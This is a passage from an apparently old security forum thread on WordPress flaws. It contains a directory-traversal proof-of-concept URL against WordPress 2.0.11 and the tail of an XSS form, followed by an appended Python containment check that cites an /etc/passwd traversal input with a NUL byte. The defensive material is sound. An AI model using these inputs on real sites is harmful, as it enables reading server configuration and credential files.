    <input type="hidden" name="wpcf_stage" value="process" />
    <input type="hidden" name="wpcf_msg" value="XSS" />
    </form>
    </body>
    </html>
    
     
    #19 +toxa+, 25.12.2007
    Last edited: 25.12.2007
  20. +toxa+

    directory traversal vulnerabilities in WP 2.0.11(win only)

    PHP:
    function validate_file(..)
    if (
    false !== strpos($file./))
    Proof of concept:
    Code:
    http://site/wp-admin/index.php?page=\..\..\.htaccess
     
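A containment check for a user-supplied relative path, added here as an example that is not the PictPress or WordPress code; it serves both the PictPress post above (size and path concatenated into "$base/cache/$size/$path", with a %00 truncating readfile()) and this validate_file() post, where only a literal "../" was looked for and "\..\" on Windows slipped through. The base directories and inputs are constructed.

```python
import posixpath
from typing import Optional


def naive_traversal_check(path: str) -> bool:
    """Rough model of the old validate_file(): passes anything without a literal '../'."""
    return "../" not in path


def resolve_under_base(base_dir: str, *user_parts: str) -> Optional[str]:
    """Join user-supplied path pieces under base_dir and return the normalized
    absolute path only if it stays inside base_dir; otherwise return None.

    - NUL bytes are rejected outright: PHP's C-string file functions stopped at
      %00, so 'passwd%00' opened 'passwd' regardless of what followed.
    - Backslashes are treated as separators before normalization, so '\\..\\..\\'
      on a Windows host cannot slip past a check that only looks for '../'.
    - The final test is a prefix comparison on the normalized path, not a
      substring search for '..'."""
    for part in user_parts:
        if "\x00" in part:
            return None
    joined = "/".join(p.replace("\\", "/") for p in user_parts).lstrip("/")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, joined))
    if candidate != base and not candidate.startswith(base.rstrip("/") + "/"):
        return None
    return candidate


# Constructed base directory mirroring dirname(__FILE__) . "/.." . "/cache"
CACHE_BASE = "/var/www/wp-content/plugins/pictpress/../cache"

if __name__ == "__main__":
    print(resolve_under_base(CACHE_BASE, "200", "photo.jpg"))
    print(resolve_under_base(CACHE_BASE, "../../../../../../../../../../", "/etc/passwd\x00"))
    print(naive_traversal_check("\\..\\..\\.htaccess"))                 # True: the old check is fooled
    print(resolve_under_base("/var/www/wp-admin", "\\..\\..\\.htaccess"))  # None: contained check holds
```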